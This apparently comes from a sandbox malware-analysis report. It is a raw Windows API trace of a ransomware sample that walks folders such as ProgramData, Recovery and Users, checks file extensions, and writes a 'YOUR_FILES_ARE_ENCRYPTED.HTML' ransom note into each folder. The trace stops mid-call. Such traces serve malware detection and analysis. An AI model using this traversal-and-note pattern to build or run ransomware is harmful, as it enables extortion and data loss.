[0159.047] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0159.047] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft" | out: lpString1="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft") returned="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft" [0159.047] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\*") returned="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\*" [0159.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c798490, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa1ccb450, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0159.049] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c798490, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa1ccb450, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.049] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0x99c671b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", cAlternateFileName="REGID1~2.SWI")) returned 1 [0159.049] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned 129 [0159.050] lstrcmpW (lpString1="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.050] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned=".swidtag" [0159.050] lstrlenW (lpString=".swidtag") returned 8 [0159.050] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned=".swidtag" [0159.050] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45b3500, ftCreationTime.dwHighDateTime=0x1d0d7d0, ftLastAccessTime.dwLowDateTime=0x7c798490, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x45b3500, ftLastWriteTime.dwHighDateTime=0x1d0d7d0, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", cAlternateFileName="REGID1~1.SWI")) returned 1 [0159.050] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned 125 [0159.050] lstrcmpW (lpString1="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.050] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned=".swidtag" [0159.050] lstrlenW (lpString=".swidtag") returned 8 [0159.050] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned=".swidtag" [0159.050] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", cAlternateFileName="REGID1~3.SWI")) returned 1 [0159.050] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned 128 [0159.050] lstrcmpW (lpString1="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.050] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned=".swidtag" [0159.050] lstrlenW (lpString=".swidtag") returned 8 [0159.050] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned=".swidtag" [0159.050] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", cAlternateFileName="REGID1~3.SWI")) returned 0 [0159.050] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0159.052] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0159.052] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0159.053] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0159.055] CloseHandle (hObject=0x4a4) returned 1 [0159.056] GetProcessHeap () returned 0x270000 [0159.057] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0159.057] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0159.057] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Start Menu") returned 29 [0159.057] GetProcessHeap () returned 0x270000 [0159.057] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0159.057] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Start Menu" | out: lpString1="\\\\?\\C:\\ProgramData\\Start Menu") returned="\\\\?\\C:\\ProgramData\\Start Menu" [0159.057] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Start Menu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Start Menu\\*") returned="\\\\?\\C:\\ProgramData\\Start Menu\\*" [0159.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Start Menu\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", cAlternateFileName="Hܾ")) returned 0xffffffff [0159.057] GetProcessHeap () returned 0x270000 [0159.058] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0159.058] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0159.058] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Templates") returned 28 [0159.058] GetProcessHeap () returned 0x270000 [0159.058] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0159.058] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Templates" | out: lpString1="\\\\?\\C:\\ProgramData\\Templates") returned="\\\\?\\C:\\ProgramData\\Templates" [0159.058] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Templates\\*") returned="\\\\?\\C:\\ProgramData\\Templates\\*" [0159.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Templates\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", cAlternateFileName="Hܾ")) returned 0xffffffff [0159.059] GetProcessHeap () returned 0x270000 [0159.060] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0159.060] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0159.060] FindClose (in: hFindFile=0x42f30c0 | out: hFindFile=0x42f30c0) returned 1 [0159.060] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 48 [0159.060] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x580 [0159.061] WriteFile (in: hFile=0x580, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe744, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe744*=0x3c00, lpOverlapped=0x0) returned 1 [0159.063] CloseHandle (hObject=0x580) returned 1 [0159.063] GetProcessHeap () returned 0x270000 [0159.064] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.066] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0db1b70, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0db1b70, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="Recovery", cAlternateFileName="")) returned 1 [0159.066] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery") returned 15 [0159.066] GetProcessHeap () returned 0x270000 [0159.066] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0159.066] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Recovery" | out: lpString1="\\\\?\\C:\\Recovery") returned="\\\\?\\C:\\Recovery" [0159.066] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Recovery\\*") returned="\\\\?\\C:\\Recovery\\*" [0159.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0db1b70, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0db1b70, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f30c0 [0159.066] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0db1b70, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0db1b70, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.066] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0d8ba10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0d8ba10, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2a069262-7156-11eb-8692-cd6fb44c6612", cAlternateFileName="2A0692~1")) returned 1 [0159.067] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612") returned 52 [0159.067] GetProcessHeap () returned 0x270000 [0159.067] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0159.068] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612" | out: lpString1="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612") returned="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612" [0159.068] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\*") returned="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\*" [0159.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0d8ba10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0d8ba10, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0159.069] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0d8ba10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0d8ba10, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.069] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0d8ba10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa527987c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x60, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0159.069] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\boot.sdi") returned 61 [0159.069] lstrcmpW (lpString1="boot.sdi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.069] PathFindExtensionW (pszPath="boot.sdi") returned=".sdi" [0159.069] lstrlenW (lpString=".sdi") returned 4 [0159.069] PathFindExtensionW (pszPath="boot.sdi") returned=".sdi" [0159.069] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xcb206996, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcb35dec0, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0xe3a4d930, ftLastWriteTime.dwHighDateTime=0x1cb88c4, nFileSizeHigh=0x0, nFileSizeLow=0x8a8e7ac, dwReserved0=0x0, dwReserved1=0x60, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0159.069] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\Winre.wim") returned 62 [0159.069] lstrcmpW (lpString1="Winre.wim", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.069] PathFindExtensionW (pszPath="Winre.wim") returned=".wim" [0159.069] lstrlenW (lpString=".wim") returned 4 [0159.069] PathFindExtensionW (pszPath="Winre.wim") returned=".wim" [0159.069] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xcb206996, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcb35dec0, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0xe3a4d930, ftLastWriteTime.dwHighDateTime=0x1cb88c4, nFileSizeHigh=0x0, nFileSizeLow=0x8a8e7ac, dwReserved0=0x0, dwReserved1=0x60, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0159.069] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0159.069] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0159.070] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0159.070] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0159.072] CloseHandle (hObject=0x4a4) returned 1 [0159.073] GetProcessHeap () returned 0x270000 [0159.074] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0159.074] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0d8ba10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0d8ba10, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2a069262-7156-11eb-8692-cd6fb44c6612", cAlternateFileName="2A0692~1")) returned 0 [0159.074] FindClose (in: hFindFile=0x42f30c0 | out: hFindFile=0x42f30c0) returned 1 [0159.074] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 45 [0159.074] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\recovery\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x580 [0159.074] WriteFile (in: hFile=0x580, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe744, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe744*=0x3c00, lpOverlapped=0x0) returned 1 [0159.076] CloseHandle (hObject=0x580) returned 1 [0159.077] GetProcessHeap () returned 0x270000 [0159.078] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0159.078] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfa10b5e0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xbba05380, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xbba05380, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0159.078] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd21ed670, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd21ed670, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="Users", cAlternateFileName="")) returned 1 [0159.078] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users") returned 12 [0159.078] GetProcessHeap () returned 0x270000 [0159.078] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0159.078] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Users" | out: lpString1="\\\\?\\C:\\Users") returned="\\\\?\\C:\\Users" [0159.078] lstrcatW (in: lpString1="\\\\?\\C:\\Users", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\*") returned="\\\\?\\C:\\Users\\*" [0159.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd21ed670, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd21ed670, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f30c0 [0159.078] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, 